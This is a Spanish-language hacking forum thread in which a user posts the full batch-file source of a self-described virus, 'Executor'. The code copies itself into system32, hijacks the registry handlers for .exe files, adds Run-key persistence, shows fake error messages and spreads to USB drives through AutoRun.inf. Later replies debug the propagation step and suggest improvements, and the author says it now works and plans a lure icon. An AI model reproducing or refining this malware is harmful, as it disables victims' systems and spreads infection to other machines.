[Batch] Executor, mi primer bichito "mutante"...

Bueno pues me he dedicado a hacer un code para un virusito que se encargue de deshabilitar los ejecutables, y al tiempo que muestre un mensaje de error pero al azar, para esto he usado una funcion que yo mismo me habia ideado y he usado VB para esta parte porque se ve un poco mas bonito y asi me evito problemas con el msg...

Tambien he hecho que se copie por USB, e igualmente con nombres al azar, por lo que seria un poco mas dificil rastrearlo, y esto es lo que le daria la caracteristica de "mutante"..

Lo he llamado Executor, pues se imaginaran porque ?? Grin

Código:

@echo off
title Executor - by SmartGenius
rem Virus que se encarga de deshabilitar el inicio
rem de aplicaciones ejecutables o .EXE, y ademas
rem de mostrar mensajes de error al azar y copiarse
rem atraves de USB con nombres diferentes...

:ini
if exist "%windir%\system32\exer.exe" goto main
if exist "%windir%\system32\extool.exe" goto main
if exist "%windir%\system32\brush.exe" goto main
if exist "%windir%\system32\linux.exe" goto main
if exist "%windir%\system32\herr.exe" goto main
if exist "%windir%\system32\smart.exe" goto main
if exist "%windir%\system32\help.exe" goto main
if exist "%windir%\system32\fuck.exe" goto main
if exist "%windir%\system32\hello.exe" goto main
if exist "%windir%\system32\open.exe" goto main

:crea
call :rdn
call :name%r%
copy %0 "%windir%\system32\%nam%.exe"
reg add HKCR\exefile\shell\open\command /ve /t REG_SZ /d "%nam%.exe" /f
reg add HKCR\exefile\shell\runas\command /ve /t REG_SZ /d "%nam%.exe" /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "%run%" /t REG_SZ /d "%windir%\system32\%nam%.exe" /f
call :main
ping -n 100 0.0.0.0 > nul
goto ini

:rdn
set p=
set /a p=((%random%*%random%)+%random%)/%random%
set r=%p:~-1%
goto :eof

:name1
set nam=
set nam=exer
set run="Herramienta del Sistema"
goto :eof

:name2
set nam=
set nam=extool
set run="Systool"
goto :eof

:name3
set nam=
set nam=brush
set run="Ayuda"
goto :eof

:name4
set nam=
set nam=linux
set run="Microsoft"
goto :eof

:name5
set nam=
set nam=herr
set run="Inicio"
goto :eof

:name6
set nam=
set nam=smart
set run="Smart"
goto :eof

:name7
set nam=
set nam=help
set run="Mantenimiento"
goto :eof

:name8
set nam=
set nam=fuck
set run="You"
goto :eof

:name9
set nam=
set nam=hello
set run="Limpieza"
goto :eof

:name0
set nam=
set nam=open
set run="Adobe"
goto :eof

:main
call :msgr
call :copiausb
goto :eof

:msgr
call :rdn
call :msg%r%
goto :eof

:msg1
echo MsgBox "Error del Sistema. No se puede continuar.", 16, "Error del Sistema" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg2
echo MsgBox "No se puede Abrir.", 16, "Error del Sistema" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg3
echo MsgBox "Archivo Corrupto.", 16, "Error del Sistema" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg4
echo MsgBox "Error de Datos.Comprobacion de Redundancia Ciclica", 16, "Error del Sistema" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg5
echo MsgBox "Error de Configuracion. No se puede continuar.", 16, "Error del Sistema" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg6
echo MsgBox "El Sistema no Responde.", 16, "Error del Sistema" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg7
echo MsgBox "No hay Memoria suficiente para realizar la Accion.", 16, "Error del Sistema" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg8
echo MsgBox "Visita http://foro.code-makers.es.", 16, "Visitanos..." >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg9
echo MsgBox "You was owned by iSmart.", 16, "Hacktool" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg0
echo MsgBox "Fuck You :P.", 16, "Error del Sistema" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:copiausb
if exist C: call :creausb C
if exist D: call :creausb D
if exist E: call :creausb E
if exist F: call :creausb F
if exist G: call :creausb G
if exist H: call :creausb H
if exist I: call :creausb I
if exist J: call :creausb J
goto :eof

:creausb
call :rdn
call :name%r%
copy %0 "%1:\%nam%.exe"
echo [Autorun] > "%1:\AutoRun.inf"
echo open="%nam%.exe" >> "%1:\AutoRun.inf"
echo action=Abrir Pendrive >> "%1:\AutoRun.inf"
echo shellexecute= "/%nam%.exe" >> "%1:\AutoRun.inf"
goto :eof

Tambien fijarse que he optimizado bastante la parte de copia USB, esta se me ocurrio como a media noche mientras no podia dormir... Cheesy

Quiero que lo miren, y me digan posibles mejoras, aunque se que me falta algo de uso de %errorlevel% y esas cosas en caso de que algo falle no se salga del programa...

Saludos.

Primer WARGAME - Reto Crackme en Batch......Participa¡¡

CUH - Malware Removal Tool....Script AntiBichos xD

Vota ¡¡ Que Marca de Movil consideras que es la Mejor ?

No me he fijado mucho en el programa, pero eso no se puede conseguir mas facilmente con el comando ASSOC?

Corrijanme si estoy equivocado... Tongue

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Claro, pero yo queria era que al intentar abrir un ejecutable salieran mensajes de error, y que al user le provocara halrse los pelos... ademas tambien que se copiara por USB y dominara el mundo Grin

Si tienes ideas o aportes, hazlos por favor !!

Saludos.

Primer WARGAME - Reto Crackme en Batch......Participa¡¡

CUH - Malware Removal Tool....Script AntiBichos xD

Vota ¡¡ Que Marca de Movil consideras que es la Mejor ?

He tomado un pc y he experimentado a infectarme, claro sin un par de lineas para que no se me deshabilitaran los ejecutables, y gracias a eso he podido "debuggear" el virus, por lo que he visto un error...

le puse el echo on y vi que al momento de copiarse por usb si creaba el autorun.inf y tambien agarraba un nombre al azar, pero en ese momento el parametro %0 no era el nombre y ubicacion del .bat original (osea nosotos) sino el nombre de la etiqueta :creausb, por lo que al copiarse daba error, asi que he agregado una linea al principio en la funcion :crea despues de las lineas donde se agrega al registro..

set my=%0

y en la parte de :creausb se modifico tambien una linea...

copy %my% "%1:\%nam%.exe"

De esa manera ya quedaron los errores arreglados, y el codigo funciona a la perfeccion..

Deberian de tomar estas ideas como la copia USB, la mutacion y los mensajes al azar para proximos codes suyos..

Un Saludo.

Primer WARGAME - Reto Crackme en Batch......Participa¡¡

CUH - Malware Removal Tool....Script AntiBichos xD

Vota ¡¡ Que Marca de Movil consideras que es la Mejor ?

Weno lo mismo t iba decir al colocar el %0 utilizando 2 o + funciones.. te surge ese problema..

pero weno ya t dist cuenta.. me alegro Cool

salu2..

Cita de: wizard_0 en Mayo 24, 2008, 08:28:51

Weno lo mismo t iba decir al colocar el %0 utilizando 2 o + funciones.. te surge ese problema..

pero weno ya t dist cuenta.. me alegro Cool

hey men, y q piensas del codigo...

dime si lo hice bien, o si voy por buen camino, ya que quiero aprender bastante de estos temas de programcion...

Saludos.

Primer WARGAME - Reto Crackme en Batch......Participa¡¡

CUH - Malware Removal Tool....Script AntiBichos xD

Vota ¡¡ Que Marca de Movil consideras que es la Mejor ?

Weno si lo kiers podes hagarrar este consejo

q pasaria si las unidades o el pendrive ya tienen un autorun.inf con otro tipo d virus.. ??¿

deverias eliminar si exist en cada unidad

asi solo kedaria el tuyo..

weno sobre el codigo.. esta bien + t sugiero q utilices el FOR para las Unidades..

eso seria todo..

salu2..

Citar

q pasaria si las unidades o el pendrive ya tienen un autorun.inf con otro tipo d virus.. ??¿

jejeje, se nota que nadie lo ha probado Cheesy

este script ya lo tome y lo experimente varias veces, y vuela el autorun.inf y vuelve y lo crea...

lo probe en una USB y me quito el anterior autorun y lo volvio a escribir, lo unico que no borro fue la otra variante del virus, ya que ese pedazo est mas dificil, pero como maximo habrian 10 archivos del virus, pero solo se ejecutaria uno con el autorun, igual alguno de los nombres que se pone debe de causar curiosidad para abrirlo asi que puede que sea mas efectivo, y mas con el icono que le pondre...

lo que dices del for ya lo habia pensado pero no sabia bien como hacerlo, asi que postee toda la parte de copia por USB y aqui me ayudaron...

Saludos.

Primer WARGAME - Reto Crackme en Batch......Participa¡¡

CUH - Malware Removal Tool....Script AntiBichos xD

Vota ¡¡ Que Marca de Movil consideras que es la Mejor ?

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Octubre 12, 2008, 02:03:29